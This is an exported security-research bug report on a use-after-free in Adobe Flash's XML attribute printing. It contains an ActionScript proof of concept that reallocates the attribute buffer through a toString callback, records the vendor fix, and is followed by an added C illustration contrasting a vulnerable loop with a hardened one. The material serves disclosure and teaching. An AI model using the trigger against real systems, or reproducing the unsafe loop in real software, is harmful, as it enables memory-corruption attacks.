sla-cker / google-security-research

Automatically exported from code.google.com/p/google-security-research

Adobe Flash: Use-after-free when printing XML Attributes #366

Closed GoogleCodeExporter closed 9 years ago

GoogleCodeExporter commented 9 years ago
If an XML attribute is set to an object that has toString defined, it can lead to a use-after-free condition if the toString function adds many attributes to the XML object while it is being printed. This happens because adding extra attributes eventually causes the buffer that contains the object variables to be reallocated.

A minimal proof of concept is as follows:

var doc:XML = new XML("<mytag name='Val'> item </mytag>");
trace(doc.firstChild.attributes.name); // Val
trace(doc.firstChild); // <mytag order="first" name="Val"> item </mytag>

// Object whose toString/valueOf run s() whenever it is converted to a string.
var n = {toString : s, valueOf : s};

for (attr in doc.firstChild.attributes) {
    trace(attr + " = " + doc.firstChild.attributes[attr]);
}

var q = doc.firstChild.attributes;
for (var i = 0; i < 100; i++) {
    // Make the var buffer big, so it doesn't immediately get reallocated as a
    // simple object (which zeros its values).
    q[i] = "t";
}
trace(doc.toString());
// The attribute value is an object, so printing it calls s(), which grows the
// attribute buffer while doc.toString() is still iterating over it.
doc.firstChild.attributes.natalie = n;
trace(doc.toString());

function s() {
    trace("hello");
    doc.firstChild.attributes.order1 = "a";
    doc.firstChild.attributes.name2 = "a";
    doc.firstChild.attributes.natalie1 = "a";
    doc.firstChild.attributes.order3 = "a1";
    doc.firstChild.attributes.b = "a2";
    doc.firstChild.attributes.order;
    var q = doc.firstChild.attributes;
    for (var i = 0; i < 1000; i++) {
        q[i] = "t"; // Add enough attributes to force the buffer to be reallocated.
    }
    return "myString";
}

A sample swf and fla are attached. This PoC only works on 64-bit Linux (probably due to pointer size affecting what gets reallocated in the freed area), but the use-after-free condition should occur on all platforms.

This bug is subject to a 90 day disclosure deadline. If 90 days elapse without a broadly available patch, then the bug report will automatically become visible to the public.

Original issue reported on code.google.com by natashe...@google.com on 5 May 2015 at 11:38
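As an added illustration (not code from the report or from Adobe), a constructed C model of the bug class the report describes: a printer walks a buffer of attribute slots while a toString-style callback can append slots and relocate that buffer, shown as the vulnerable loop shape next to a hardened one. All type and function names here are hypothetical.

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
/* Constructed model of the bug class (not Flash's code): attribute slots sit in a
 * growable array that is freed and replaced when full; printing a slot may run a
 * callback (the report's toString) that appends more slots mid-iteration. */
typedef struct AttrBuf AttrBuf;
typedef void (*to_string_cb)(AttrBuf *owner);
typedef struct { char name[16]; to_string_cb cb; } Attr;
struct AttrBuf { Attr *slots; size_t count, cap; };

static void attr_add(AttrBuf *b, const char *name, to_string_cb cb) {
    if (b->count == b->cap) {              /* grow: new block, old block freed */
        b->cap = b->cap ? b->cap * 2 : 2;
        Attr *fresh = malloc(b->cap * sizeof *fresh);
        if (!fresh) abort();
        if (b->count) memcpy(fresh, b->slots, b->count * sizeof *fresh);
        free(b->slots);                    /* any cached slot pointer now dangles */
        b->slots = fresh;
    }
    snprintf(b->slots[b->count].name, sizeof b->slots[0].name, "%s", name);
    b->slots[b->count++].cb = cb;
}
/* VULNERABLE shape (shown, never called): 'a' is cached across the callback, so
 * once the callback grows the array, a[i] reads the freed block. */
void print_attrs_unsafe(AttrBuf *b) {
    Attr *a = b->slots;
    for (size_t i = 0; i < b->count; i++) { if (a[i].cb) a[i].cb(b); printf("%s ", a[i].name); }
}
/* HARDENED shape: fix the count up front, re-read the slot pointer after every
 * callback, skip slots past the live count. Returns how many callbacks moved
 * the array, i.e. how often the unsafe loop would have read freed memory. */
int print_attrs_safe(AttrBuf *b) {
    size_t n = b->count; int moved = 0;
    for (size_t i = 0; i < n && i < b->count; i++) {
        Attr *before = b->slots;
        if (b->slots[i].cb) b->slots[i].cb(b);
        moved += (b->slots != before);
        if (i < b->count) printf("%s ", b->slots[i].name);  /* fresh pointer */
    }
    return moved;
}
static void evil_to_string(AttrBuf *o)     /* mirrors s() in the PoC: bulk-add */
{ for (int i = 0; i < 100; i++) attr_add(o, "t", NULL); }
int demo(void) {                            /* the report's scenario; expected 1 */
    AttrBuf b = {0};
    attr_add(&b, "name", NULL); attr_add(&b, "natalie", evil_to_string);
    int moved = print_attrs_safe(&b);
    free(b.slots);
    return moved;
}
```

Run under AddressSanitizer, calling print_attrs_unsafe on the same scenario is what would report the heap-use-after-free; the safe loop reports only that the block moved.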

GoogleCodeExporter commented 9 years ago
This is PSIRT-3656

Original comment by natashe...@google.com on 6 May 2015 at 7:08

GoogleCodeExporter commented 9 years ago

Original comment by cev...@google.com on 5 Jul 2015 at 6:31

GoogleCodeExporter commented 9 years ago
Fixed: https://helpx.adobe.com/security/products/flash-player/apsb15-16.html

Original comment by cev...@google.com on 9 Jul 2015 at 12:37

GoogleCodeExporter commented 9 years ago

Original comment by natashe...@google.com on 3 Aug 2015 at 9:42